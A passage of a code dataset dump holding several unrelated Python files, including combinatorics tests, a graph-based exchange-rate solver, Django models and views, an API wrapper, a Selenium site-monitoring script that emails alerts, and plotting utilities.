tansform')\nplt.show()","sub_path":"prob1.py","file_name":"prob1.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"60060031","text":"from core import *\nfrom random import randint\n\n# family from list of lists\n\"\"\"\nF = [[1,2],[1],[3],[4,3],[4]]\nF = familyFromList(F)\n\"\"\"\n\n\n# makes a random family\n# and makes it union closed\n\"\"\"\nF = randomFamily(4,6)\nF = makeUnionClosed(F)\n\"\"\"\n\n\"\"\"\nn = 4\nU = frozenset(range(1,n+1))\nPU = powerset(U)\nPPU = powerset(PU)\nprint(\"Their are \",len(PU),\" members in total\")\nprint(\"Their are \",len(PPU),\" families in total\")\nSF = 0\nMF = 0\nNUHCF = 0\nUCF = 0\nfor f in PPU:\n if isSeperating(f):\n SF += 1\n \n if isMinimal(f):\n MF += 1\n \n if isUnionClosed(f):\n UCF += 1\n \n if (not isUnionClosed(f)) and hasCommon(f):\n NUHCF += 1\n \nprint(\"Their are \",SF,\" seperating families in total\")\nprint(\"Their are \",MF,\" minimal families in total\")\nprint(\"Their are \",UCF,\" families that are union closed in total\")\nprint(\"Their are \",NUHCF,\" families that are not union closed but do have a common element, in total\")\n\"\"\"\n\n# this family is a counter-example to the non-theorem that\n# The smallest(in cardinality) nonempty set contains\n# an element that is in at least half the members.\n\"\"\"\nG1 = familyFromList([[],[1],[1,2,3]])\nG2 = familyFromList([[],[2],[1,2,3]])\nG3 = familyFromList([[],[3],[1,2,3]])\n\nH1 = familyFromList([[5,6,7,8,9],[4,6,7,8,9]])\nH2 = familyFromList([[4,5,7,8,9],[4,5,6,8,9]])\nH3 = familyFromList([[4,5,6,7,9],[4,5,6,7,8]])\n\nR1 = familyFromList([[],[1,2,3]])\nR2 = powerset([1,2,3])\nR3 = familyFromList([[4,5,6,7,8,9]])\n \nF = R1.union(mixFamilies(G1,H1))\nF = F.union(mixFamilies(G2,H2))\nF = F.union(mixFamilies(G3,H3))\nF = F.union(mixFamilies(R2,R3))\ninspectFamily(F)\n\"\"\"\n\n\n\"\"\"\nn = 10\nprint(\"making powerset of universe...\")\nP = powerset(range(1,n+1))\nprint(\"power set has cardinality \",len(P))\nprint(\"done\")\nfor i in range(10000):\n print(i)\n k = randint(3, len(P)/64)\n f = set(sample(P,k))\n #f = makeUnionClosed(f)\n inspectFamily(f)\n\"\"\"\n\nfor n in range(1,5):\n U = frozenset(range(1,n+1))\n PU = powerset(U)\n PPU = powerset(PU)\n UCF = 0\n for f in PPU:\n if isUnionClosed(f):\n UCF += 1\n print(n, UCF)\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"647041741","text":"from sys import stdin\nfrom queue import Queue\nfrom math import ceil\n\nlista = []\ngrafo = []\nstringNum = {}\nvisitados = []\n\ndef bfs(ini, fin):\n global grafo, visitados\n cola = Queue()\n cola.put(ini)\n visitados[ini] = 1\n while cola.empty() == False:\n u = cola.get()\n if u == fin:\n break\n\n for tupla in grafo[u]:\n v, star, end = tupla\n if visitados[v] == -1:\n visitados[v] = (visitados[u] * end)/star\n cola.put(v)\n\n\ndef lectura(tam, a):\n global stringNum, grafo\n grafo.append([])\n stringNum[a] = tam\n return tam + 1\n\n\ndef reducir(a, b):\n i = 2\n while i <= min(a, b):\n if a % i == 0 and b % i == 0:\n a //= i\n b //= i\n\n else:\n i += 1\n\n return [a, b]\n\n\ndef main():\n global grafo, visitados, stringNum, lista\n tam = 0\n lista = list(map(str, stdin.readline().split()))\n while lista[0] != \".\":\n if lista[0] == \"!\":\n temp = reducir(int(lista[1]), int(lista[4]))\n ini_n = stringNum.get(lista[2])\n if ini_n == None:\n tam = lectura(tam, lista[2])\n ini_n = tam - 1\n\n fin_n = stringNum.get(lista[5])\n if fin_n == None:\n tam = lectura(tam, lista[5])\n fin_n = tam - 1\n\n grafo[ini_n].append((fin_n, temp[0], temp[1]))\n grafo[fin_n].append((ini_n, temp[1], temp[0]))\n\n else:\n ini_n = stringNum.get(lista[1])\n if ini_n == None:\n tam = lectura(tam, lista[1])\n ini_n = tam - 1\n\n fin_n = stringNum.get(lista[3])\n if fin_n == None:\n tam = lectura(tam, lista[3])\n fin_n = tam - 1\n \n visitados = [-1 for i in range(tam)]\n bfs(ini_n, fin_n)\n\n if visitados[fin_n] != -1:\n i = 1\n m = visitados[fin_n]\n a = m\n while (i * m) - ((i * m)//1) != 0:\n i += 1\n a = i * m\n b = int(a)\n c = a - b \n if c > 0.9999999999999:\n a = ceil(a)\n break\n\n print(\"{} {} = {} {}\".format(i, lista[1], ceil(a), lista[3]))\n \n else:\n print(\"? {} = ? {}\".format(lista[1], lista[3]))\n lista = list(map(str, stdin.readline().split()))\n\n\nmain()","sub_path":"Taller 3/10113 Exchange Rates.py","file_name":"10113 Exchange Rates.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"650949334","text":"#coding:utf-8\nimport pandas as pd\n\n#pandas读excel\nres = pd.read_excel(\"debug_api.xlsx\")\n#输出标题列\nprint(res.columns.values)\n#输出第一行数据不包含表头\ndata = res.loc[0].values\nprint(\"对应类型是:\",type(data),\"数据是:\",data)\n\n#pandas写excel\nwrite_data = {\"姓名\":[\"测试1\",\"测试2\",\"测试3\",\"测试4\"],\"性别\":[\"测试数据1\",\"测试数据2\",\"测试数据3\",\"测试数据4\"]}\ndf = pd.DataFrame(write_data)\nwriter_exe = pd.ExcelWriter(r\"test1.xlsx\")\n\ndf.to_excel(writer_exe,sheet_name=r\"sheet1\",index=False,header=True)\nwriter_exe.save()\n","sub_path":"untitled/dome1/Requests_demo-master/demo_excelddtdriver/common/readexcel_pandas.py","file_name":"readexcel_pandas.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"563542689","text":"from rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\n\nfrom .serializers import RegistrationSerializer\n\n# Create your views here.\n\n\n@api_view(['POST', ])\n@permission_classes(())\ndef register(request):\n if request.method == 'POST':\n serializer = RegistrationSerializer(data=request.data)\n data = {}\n if serializer.is_valid():\n account = serializer.save()\n data['email']=account.email\n token = Token.objects.get(user=account).key\n data['token'] = token\n else :\n data = serializer.errors\n\n return Response(data)\n","sub_path":"back-office/backOffice/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"193932385","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\n\nclass Town(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n\n\nclass TownArea(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n town = models.ForeignKey(Town, related_name='areas')\n\n\n\n\n\nclass Skill(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n description = models.CharField(max_length=200)\n\nclass Language(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n\n\nclass ProfessionalTest(models.Model):\n name = models.CharField(max_length=100)\n slug = models.SlugField(max_length=100)\n\n\nclass ProfessionalTestQuestion(models.Model):\n ask = models.CharField(max_length=100)\n ans = models.CharField(max_length=100)\n test = models.ForeignKey(ProfessionalTest, related_name='questions')\n\n\n\n\n\nclass Agency(models.Model):\n name = models.CharField(max_length=100)\n description = models.TextField()\n\nclass Sitter(models.Model):\n EMPLOYEE_TIME = (\n ('F', 'Full time'),\n ('S', 'Not full time'),\n )\n\n CHILD_AGE = (\n ('S', 'Small (1 - 3)'),\n ('A', 'Average (3 - 6)'),\n ('B', 'Big (6 - 10)'),\n )\n\n user = models.OneToOneField(User, related_name='sitter', null=True)\n agency = models.ForeignKey(Agency, related_name='sitter', null=True, blank=True)\n description = models.TextField()\n work_town = models.ForeignKey(Town, related_name='sitters_work')\n\n type_employee = models.CharField(max_length=1, choices=EMPLOYEE_TIME)\n child_age = models.CharField(max_length=1, choices=CHILD_AGE)\n avatar = models.CharField(max_length=100)\n skills = models.ManyToManyField(Skill, related_name='sitters')\n languages = models.ManyToManyField(Language, related_name='sitters')\n\n available = models.BooleanField(default=True)\n tests = models.ManyToManyField(ProfessionalTest, related_name='sitters', through='TestMembership')\n\n desired_price = models.FloatField()\n\n\n\n\nclass Events(models.Model):\n TYPE_PERIOD = (\n ('F', 'Free'),\n ('V', 'Vocation'),\n ('W', 'Work'),\n )\n\n type = models.CharField(max_length=1, choices=TYPE_PERIOD)\n start_date = models.DateTimeField()\n end_date = models.DateTimeField()\n\n sitter = models.ForeignKey(Sitter, related_name='events')\n\n\n\nclass TestMembership(models.Model):\n sitter = models.ForeignKey(Sitter)\n test = models.ForeignKey(ProfessionalTest)\n date_complete = models.DateField(auto_now_add=True)\n mark = models.IntegerField()\n\n\nclass SitterDocument(models.Model):\n name = models.CharField(max_length=200)\n path = models.CharField(max_length=100)\n sitter = models.ForeignKey(Sitter, related_name='documents')\n\n\n\nclass Parent(models.Model):\n user = models.OneToOneField(User, related_name='parent', null=True)\n\n locate_town = models.ForeignKey(Town, related_name='sitters_locate')\n address = models.CharField(max_length=255)\n avatar = models.CharField(max_length=100)\n\nclass Child(models.Model):\n avatar = models.CharField(max_length=100)\n name = models.CharField(max_length=100)\n\n parent = models.ForeignKey(Parent, related_name='children')\n description = models.TextField()\n\n birthday = models.DateField()\n\n\nTIME_PAYMENT_TYPE = (\n ('S', 'Session'),\n ('C', 'Contract'),\n )\nPAYMENT_TYPE = (\n ('F', 'Fixed'),\n ('H', 'Per hour'),\n )\n\nclass CommentBlock(models.Model):\n pass\n\nclass Comment(models.Model):\n pub_date = models.DateTimeField(auto_now_add=True)\n\n text = models.CharField(default='', max_length=255)\n user = models.ForeignKey(User, related_name='comments')\n comment_block = models.ForeignKey(CommentBlock, related_name='comments')\n\nclass Job(models.Model):\n #place and children\n children = models.ManyToManyField(Child, related_name='jobs')\n address = models.CharField(max_length=255)\n\n #payment\n time_payment_type = models.CharField(max_length=1, choices=TIME_PAYMENT_TYPE)\n payment_type = models.CharField(max_length=1, choices=PAYMENT_TYPE)\n price = models.FloatField(default=0.0)\n\n\n #filters\n skills = models.ManyToManyField(Skill, related_name='skills')\n languages = models.ManyToManyField(Skill, related_name='languages')\n agency = models.BooleanField(default=False)\n document = models.BooleanField(default=False)\n\n auction = models.BooleanField(default=True)\n show_auction = models.BooleanField(default=False)\n\n show_comments = models.BooleanField(default=False)\n comment_block = models.OneToOneField(CommentBlock, related_name='job')\n\n\nclass JopPeriod(models.Model):\n start_date = models.DateTimeField()\n end_date = models.DateTimeField()\n\n job = models.ForeignKey(Job, related_name='periods')\n\n\nclass Bid(models.Model):\n #payment\n time_payment_type = models.CharField(max_length=1, choices=TIME_PAYMENT_TYPE)\n payment_type = models.CharField(max_length=1, choices=PAYMENT_TYPE)\n price = models.FloatField(default=0.0)\n\n sitter = models.ForeignKey(Sitter, related_name='sitter')\n\n visible = models.BooleanField(default=False)\n approve = models.BooleanField(default=False)\n\n job = models.ForeignKey(Job, related_name='bids')\n\n\nclass Contract(models.Model):\n job = models.ForeignKey(Job, related_name='contracts')\n bid = models.ForeignKey(Bid, related_name='contracts')\n\n parent = models.ForeignKey(Parent, related_name='contracts')\n sitter = models.ForeignKey(Sitter, related_name='contracts')\n\n\n","sub_path":"baby_test/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"351804803","text":"import logging\nfrom .base_command import BaseCommand\nfrom ..exception import CTERAException\nfrom .enum import PlanItem, PlanRetention\nfrom ..common import union\n\n\nclass Plans(BaseCommand):\n \"\"\"\n Global Admin Plan APIs\n \"\"\"\n default = ['name']\n\n def _get_entire_object(self, name):\n \"\"\"\n Get a subscription plan\n\n :param str name: Name of the subscription plan\n \"\"\"\n try:\n return self._portal.get('/plans/' + name)\n except CTERAException as error:\n raise CTERAException('Could not find subscription plan', error)\n\n def get(self, name, include=None):\n \"\"\"\n Retrieve subscription plan properties\n\n :param str name: Name of the subscription plan\n :param list[str] include: List of fields to retrieve, defaults to ['name']\n :return: The subscription plan, including the requested fields\n \"\"\"\n include = union(include or [], Plans.default)\n include = ['/' + attr for attr in include]\n plan = self._portal.get_multi('/plans/' + name, include)\n if plan.name is None:\n raise CTERAException('Could not find subscription plan', None, name=name)\n return plan\n\n def add(self, name, retention=None, quotas=None):\n \"\"\"\n Add a subscription plan\n\n :param dict,optional retention: The data retention policy\n :param dict,optional quotas: The items included in the plan and their respective quota\n \"\"\"\n plan = self._portal.default_class('Plan')\n plan.name = name\n Plans._assign_retention(plan, retention)\n Plans._assign_quotas(plan, quotas)\n try:\n response = self._portal.add('/plans', plan)\n logging.getLogger().info(\"Plan created. %s\", {'plan': name})\n return response\n except CTERAException as error:\n logging.getLogger().error(\"Plan creation failed.\")\n raise CTERAException('Plan creation failed', error)\n\n def modify(self, name, retention=None, quotas=None, apply_changes=True):\n \"\"\"\n Modify a subscription plan\n\n :param dict,optional retention: The data retention policy\n :param dict,optional quotas: The items included in the plan and their respective quota\n :param bool,optional apply_changes: Apply provisioning changes immediately\n \"\"\"\n plan = self._get_entire_object(name)\n Plans._assign_retention(plan, retention)\n Plans._assign_quotas(plan, quotas)\n try:\n response = self._portal.put('/plans/' + name, plan)\n logging.getLogger().info(\"Plan modified. %s\", {'plan': name})\n if apply_changes:\n if self._portal.session().in_tenant_context():\n self._portal.users.apply_changes(True)\n else:\n self._portal.portals.apply_changes(True)\n return response\n except CTERAException as error:\n logging.getLogger().error(\"Could not modify subscription plan.\")\n raise CTERAException('Could not modify subscription plan', error)\n\n @staticmethod\n def _assign_retention(plan, retention):\n if retention is not None:\n plan.retentionPolicy.retainAll = retention.get(PlanRetention.All, plan.retentionPolicy.retainAll)\n plan.retentionPolicy.hourly = retention.get(PlanRetention.Hourly, plan.retentionPolicy.hourly)\n plan.retentionPolicy.daily = retention.get(PlanRetention.Daily, plan.retentionPolicy.daily)\n plan.retentionPolicy.weekly = retention.get(PlanRetention.Weekly, plan.retentionPolicy.weekly)\n plan.retentionPolicy.monthly = retention.get(PlanRetention.Monthly, plan.retentionPolicy.monthly)\n plan.retentionPolicy.quarterly = retention.get(PlanRetention.Quarterly, plan.retentionPolicy.quarterly)\n plan.retentionPolicy.yearly = retention.get(PlanRetention.Yearly, plan.retentionPolicy.yearly)\n plan.retentionPolicy.retainDeleted = retention.get(PlanRetention.Deleted, plan.retentionPolicy.retainDeleted)\n\n @staticmethod\n def _assign_quotas(plan, quotas):\n if quotas is not None:\n plan.vGateways4.amount = quotas.get(PlanItem.EV4, plan.vGateways4.amount)\n plan.vGateways8.amount = quotas.get(PlanItem.EV8, plan.vGateways8.amount)\n plan.appliances.amount = quotas.get(PlanItem.EV16, plan.appliances.amount) # EV16\n plan.vGateways32.amount = quotas.get(PlanItem.EV32, plan.vGateways32.amount)\n plan.vGateways64.amount = quotas.get(PlanItem.EV64, plan.vGateways64.amount)\n plan.vGateways128.amount = quotas.get(PlanItem.EV128, plan.vGateways128.amount)\n plan.workstationAgents.amount = quotas.get(PlanItem.WA, plan.workstationAgents.amount)\n plan.serverAgents.amount = quotas.get(PlanItem.SA, plan.serverAgents.amount)\n plan.cloudDrives.amount = quotas.get(PlanItem.Share, plan.cloudDrives.amount)\n plan.cloudDrivesLite.amount = quotas.get(PlanItem.Connect, plan.cloudDrivesLite.amount)\n\n def delete(self, name):\n \"\"\"\n Delete a subscription plan\n\n :param str username: The name of the subscription plan\n \"\"\"\n try:\n response = self._portal.delete('/plans/' + name)\n logging.getLogger().info(\"Plan deleted. %s\", {'name': name})\n return response\n except CTERAException as error:\n logging.getLogger().error(\"Plan deletion failed.\")\n raise CTERAException('Plan deletion failed', error)\n","sub_path":"cterasdk/core/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":5599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"56740317","text":"#!/usr/bin/env python\n\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport sys\nimport os\npath = os.path.abspath('..')\nsys.path.append(path)\npath = os.path.abspath('../..')\nsys.path.append(path)\nfrom covar_plotter import plot_cov_ellipse\nfrom Mmani.embedding.embed_with_rmetric import *\nfrom Mmani.embedding.spectral_embedding_ import _graph_is_connected\n\n\n\"\"\" Small demo with sdss_corrected_spectra \"\"\"\nrad = 2000 # from analyze_spectra, rad in [1000, 2000] gives dim = 1.9\n # number neighbors 3..12\nremove_outliers = True\ndegmin = 5\n\ncompute_H = True\nmdimY = 6\n\nsave_fig = True\n\n# Load spectra\n\ndata = np.load('spectra.npz')\nwavelengths = data['wavelengths']\nX = data['spectra']\nprint( X.shape )\nn_samples = X.shape[0]\n\nflann = FLANN()\nparams = flann.build_index(X)\ndists = distance_matrix( X, flindex = flann, mode='radius_neighbors', \n neighbors_radius=rad*1.5 )\nA = affinity_matrix( dists, rad )\n\n#plt.imshow(A.toarray())\n#plt.show()\n\n# Preprocessing\n\nif remove_outliers:\n degrees = np.asarray(A.sum(axis=1)).squeeze()\n deg_mean = np.mean( degrees )\n deg_std = np.std( degrees )\n iikeep = np.nonzero( degrees >= degmin )\n iikeep = iikeep[ 0 ]\n nodes_removed = n_samples - iikeep.size\n print( '---Removing ' + repr(nodes_removed) + ' nodes with degree <' + repr(degmin))\n X = X[ iikeep, : ]\n A = A.toarray()[ iikeep, iikeep ]\n dists = dists.toarray()[ iikeep, iikeep ]\n n_samples = iikeep.size\n\n# Embeddings\n\n# geometric embedding\ndistance_matrix, similarity_matrix, laplacian, Y, H = embed_with_rmetric( X, mdimY, rad )\n\n# Plot the results\n\nn_samplot = np.minimum( 1000, n_samples ) # subsample the data\niisamples = np.random.randint( 0, n_samples, size=n_samplot )\n\n\n\"\"\"\ndetH = np.linalg.det(H[:,:2,:2])\nineg = np.nonzero( detH <= 0 )\nif ineg[0].size > 0:\n print( ineg[0].size, ' negative or singular covariance matrices' )\n plt.plot( detH )\n plt.title( 'detH' )\n plt.show()\n\"\"\"\n\n# plot the evectors\n\n#plt.plot( Y, marker='.', markersize=0.4,linestyle='None' )\n#plt.title( 'evectors')\n#plt.show()\n\nax0 = 1\nax1 = 3\niax = [ax0, ax1]\nax = plt.gca()\nplt.plot( Y[iisamples,ax0], Y[ iisamples, ax1], marker='.', markersize=2,linestyle='None',label='Y' )\n#plt.show()\n\nif compute_H:\n degrees = np.asarray(similarity_matrix.sum(axis=1)).squeeze()\n degmax = np.max( degrees )\n cov0 = np.eye(2)/1.e4\n for i in range(n_samplot):\n ii = iisamples[i]\n cov = H[ ii, (1,3), (1,3) ].squeeze()\n if i in [0,3,100]:\n print( cov )\n if np.linalg.det(cov)>0:\n plot_cov_ellipse( cov*rad*5, Y[ii,(1,3)], nstd=2, ax=ax, edgecolor='none', facecolor=[ 0, degrees[ii]/degmax, 0])\n# plot_cov_ellipse( cov0, Y[ii,:2], nstd=2, ax=ax, edgecolor='none', facecolor='pink')\n# print( cov, np.linalg.det( cov ) )\n if save_fig:\n plt.savefig( \"spectra-emb\"+\".png\", format='png' )\n plt.show()\n\n\n\n\n\n","sub_path":"astrodemo/small_demo.py","file_name":"small_demo.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"195050479","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import\nimport logging, time, copy\n\nimport pprint\n\nfrom natrix.common import exception as natrix_exceptions\n\nfrom . import serializers as adapter_serializers\n\nfrom .store import store_message\nfrom .terminalapi import TerminalAPI\n\nlogger = logging.getLogger(__name__)\n\nclass CommandProcessor(object):\n \"\"\"Command Processor\n\n Entrance of command adapter, it includes all methods about command-related process.\n There are three types of command-related message:\n - command info message\n High-level command message, it includes three attributes: command, timestamp and terminals_info.\n This type messages can generate many comamnd-request messages.\n - command request message\n\n - command response message\n\n\n \"\"\"\n\n STAGES = ('distribute', 'dead', 'response')\n\n def __init__(self, stage, command):\n if not stage in self.STAGES:\n raise natrix_exceptions.ParameterException(parameter='stage')\n else:\n self.stage = stage\n\n self.command = command\n\n def distribute_command(self):\n \"\"\"distribute command\n\n :return:\n \"\"\"\n command_adapter = adapter_serializers.CommandAdapter(data=self.command)\n if not command_adapter.is_valid():\n logger.error('Receive an invaid data : {}'.format(command_adapter.format_errors()))\n raise natrix_exceptions.TriggerBugException(\n message=u'command is invalid: {}'.format(command_adapter.format_errors()))\n\n command_adapter.process()\n\n def process_dead_command(self):\n \"\"\"process dead-command\n\n The command-reqeust message has a expirate time\n\n :return:\n \"\"\"\n command_terminal = adapter_serializers.CommandTerminal(data=self.command)\n if not command_terminal.is_valid():\n logger.error('Receive an invaid data : {}'.format(command_terminal.format_errors()))\n raise natrix_exceptions.TriggerBugException(\n message=u'command is invalid: {}'.format(command_terminal.format_errors())\n )\n\n if not command_terminal.process():\n # TODO:\n logger.error('failed')\n else:\n logger.info('success')\n\n def process_dial_response(self):\n command_response = adapter_serializers.CommandResponse(data=self.command)\n if not command_response.is_valid():\n logger.error('Receive an invaid data : {}'.format(command_response.format_errors()))\n logger.error('Error format data info: {}'.format(self.command))\n raise natrix_exceptions.TriggerBugException(\n message=u'command is invalid: {}'.format(command_response.format_errors())\n )\n\n if not command_response.process():\n # TODO:\n pass\n\n @staticmethod\n def process_unresponse():\n messages = []\n message = {\n 'errorcode': 2408,\n 'errorinfo': u'Terminal response timeout'\n }\n message['command_response_process_time'] = int(time.time() * 1000)\n\n unresponse_info = adapter_serializers.AdapterCommandStatus.clean_command_cache()\n for command_uuid, command_info in unresponse_info.items():\n message['command_uuid'] = command_uuid\n for timestamp, terminals in command_info.items():\n message['command_generate_time'] = int(timestamp * 1000)\n for terminal in terminals:\n temp_message = copy.copy(message)\n\n temp_message['terminal'] = terminal\n\n terminal_api = TerminalAPI(terminal)\n\n temp_message['organization_id'] = terminal_api.get_org_ids()\n temp_message['organization_name'] = terminal_api.get_org_names()\n temp_message['organization_isp'] = terminal_api.get_register_isp()\n\n temp_message['province'] = terminal_api.get_register_province()\n temp_message['city'] = terminal_api.get_register_city()\n messages.append(temp_message)\n # store message\n pprint.pprint(messages)\n for data in messages:\n store_message(type='error', data=data)\n\n def do(self):\n if self.stage == 'distribute':\n self.distribute_command()\n elif self.stage == 'dead':\n self.process_dead_command()\n elif self.stage == 'response':\n self.process_dial_response()\n else:\n # TODO:\n pass\n","sub_path":"benchmark/backends/command_adapter/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"311431440","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait # 해당 태그를 기다림\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException # 태그가 없는 예외 처리\nimport schedule\nimport time\nimport smtplib\nimport datetime\nfrom email.mime.text import MIMEText\nimport daemon\n\n\n\n\ndef job_checkTheSite():\n\toptions = webdriver.ChromeOptions()\n\toptions.add_argument('headless')\n\toptions.add_argument('window-size=1920x1080')\n\toptions.add_argument(\"disable-gpu\")\n\toptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n\toptions.add_argument(\"lang=ko_KR\") # 한국어!\n\tdriver = webdriver.Chrome(executable_path=r'/Users/steve/Downloads/chromedriver', options=options)\n\t#driver = webdriver.Chrome(executable_path=r'c:\\util\\chromedriver.exe', chrome_options=options)\n\tdriver.implicitly_wait(1)\n\n\t \n\ttry: # 정상 처리\n\n\t\tnow = datetime.datetime.now()\n\t\tnowDatetime = now.strftime('%Y-%m-%d %H:%M:%S')\n\t\tprint(nowDatetime)\n\t\twith open('/tmp/echo.txt', 'a') as fh:\n\t\t\tfh.write(\"{}\\n\".format(nowDatetime))\n\n\t\tdriver.get('https://learn.hoseo.edu')\n\t\t# 아이디/비밀번호를 입력해준다.\n\t\tdriver.find_element_by_name('user_id').send_keys('1111')\n\t\tdriver.find_element_by_name('password').send_keys('1111')\n\t\tdriver.find_element_by_xpath('//*[@id=\"entry-login\"]').click()\n\t\t# driver = webdriver.Chrome(executable_path=r'C:\\path\\to\\chromedriver.exe')\n\t\t# driver.get('http://google.com/')\n\n\t \n\t# except TimeoutException: # 예외 처리\n\texcept Exception as e:\n\n\t\trecipients = ['ramiah@nate.com','hunter0x01@gmail.com']\n\t\tsmtp = smtplib.SMTP('smtp.gmail.com', 587)\n\t\tsmtp.ehlo() # say Hello\n\t\tsmtp.starttls() # TLS 사용시 필요\n\t\tsmtp.login('hunter0x01@gmail.com', '1111')\n\n\t\tmsg = MIMEText('블랙보드 접속 및 예외사항이 발생했습니다.')\n\t\tmsg['Subject'] = '블랙보드 예외가 발생하였습니다.'\n\t\tmsg['To'] = \", \".join(recipients)\n\t\tsmtp.sendmail('hunter0x01@gmail.com', 'hunter0x01@gmail.com', msg.as_string())\n\t \n\t\tsmtp.quit()\n\t \n\tfinally: # 정상, 예외 둘 중 하나여도 반드시 실행\n\t driver.quit()\n\n# 5분마다 웹사이트를 점검합니다.\nschedule.every(10).seconds.do(job_checkTheSite)\n\n\ndef main():\n\ttry:\n\n\t\twhile True: \n\t\t\tschedule.run_pending() \n\t\t\ttime.sleep(1)\n\n\texcept KeyboardInterrupt:\n\t print('종료합니다!!')\n\n\nwith daemon.DaemonContext():\n\tmain()\n\n\n","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"186762789","text":"\"\"\"Plot function definitions.\"\"\"\n\nimport numpy as np\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport seaborn\n\n\ndef plot_battery_cases_comparisons_bubbles(\n read_path,\n results_path,\n plot_type\n # Choices: 'simple_payback_time', 'discounted_payback_time', 'storage_size', 'efficiency', 'energy_cost',\n # 'operation_cost_savings_annual', 'operation_cost_savings_annual_percentage'.\n):\n \"\"\"Plot various battery case comparisons.\"\"\"\n\n # Define plot settings.\n seaborn.set()\n plt.rcParams['font.serif'] = 'Arial'\n plt.rcParams['font.family'] = 'serif'\n\n # Load result data for plotting.\n results = pd.read_csv(read_path, index_col='battery_technology')\n set_years = results.columns\n set_battery_technologies = results.index\n x_array = np.arange(1, set_years.shape[0]+1, 1)\n y_array = np.arange(1, set_battery_technologies.shape[0]+1, 1)\n colors = matplotlib.cm.Paired(np.linspace(0, 1, set_battery_technologies.shape[0]))\n\n # Create plot.\n (fig, ax) = plt.subplots(1, 1)\n for i_battery_technology in np.arange(0, set_battery_technologies.shape[0], 1):\n for i_year in np.arange(0, len(x_array), 1):\n ax.scatter(\n x_array[i_year],\n y_array[i_battery_technology],\n marker='o', facecolors=colors[i_battery_technology], edgecolors='none',\n s=(\n 2000.0/max(results.max(axis=0)) * results.iloc[i_battery_technology, i_year]\n if max(results.max(axis=0)) != 0.0 else 0.0\n ),\n alpha=0.7\n )\n\n if results.iloc[i_battery_technology, i_year] != 0.0:\n ax.text(\n x_array[i_year], y_array[i_battery_technology],\n (\n format(\n results.iloc[i_battery_technology, i_year],\n ('.0f' if plot_type != 'efficiency' and plot_type != 'savings_year_percentage' else '.2f')\n )\n + ('%' if plot_type == 'savings_year_percentage' else '')\n ),\n weight='bold',\n fontsize=9,\n bbox={'facecolor': 'none', 'alpha': 0.5, 'pad': 1, 'edgecolor': 'none'},\n ha='center', va='center'\n )\n\n # Modify plot.\n ax.set_xticks(x_array)\n x_labels = [item.get_text() for item in ax.get_xticklabels()]\n for i_year in np.arange(0, len(x_array), 1):\n x_labels[i_year] = set_years[i_year]\n ax.set_xticklabels(x_labels)\n legend_labels = ['Flooded LA', 'VRLA', 'LFP', 'NCA', 'NMC', 'LTO', 'NaNiCl'] # TODO: Make labels dynamic.\n ax.set_yticks(y_array)\n y_labels = [item.get_text() for item in ax.get_yticklabels()]\n for i in np.arange(0, len(y_array), 1):\n y_labels[i] = legend_labels[i]\n ax.set_yticklabels(y_labels)\n ax.set_aspect(aspect=0.5)\n\n # Modify plot title.\n if plot_type == 'simple_payback_time':\n title = 'Simple payback time in years'\n elif plot_type == 'discounted_payback_time':\n title = 'Discounted payback time in years'\n elif plot_type == 'storage_size':\n title = 'Storage size in kWh'\n elif plot_type == 'efficiency':\n title = 'Efficiency in %%'\n elif plot_type == 'operation_cost_savings_annual':\n title = 'Annual operation cost savings in SGD'\n elif plot_type == 'operation_cost_savings_annual_percentage':\n title = 'Relative annual operation cost savings in %%'\n ax.title.set_text(title)\n\n # Save plot to SVG.\n fig.savefig(os.path.join(results_path, plot_type + '.svg'))\n\n\ndef plot_battery_cases_payback_comparison_lines(\n read_path,\n results_path,\n plot_type # Choices: 'simple_payback_time', 'discounted_payback_time'.\n):\n \"\"\"Plot battery cases payback time comparison.\"\"\"\n\n # Define plot settings.\n seaborn.set()\n plt.rcParams['font.serif'] = 'Arial'\n plt.rcParams['font.family'] = 'serif'\n\n # Load result data for plotting.\n results = pd.read_csv(read_path, index_col='battery_technology')\n years = results.columns\n 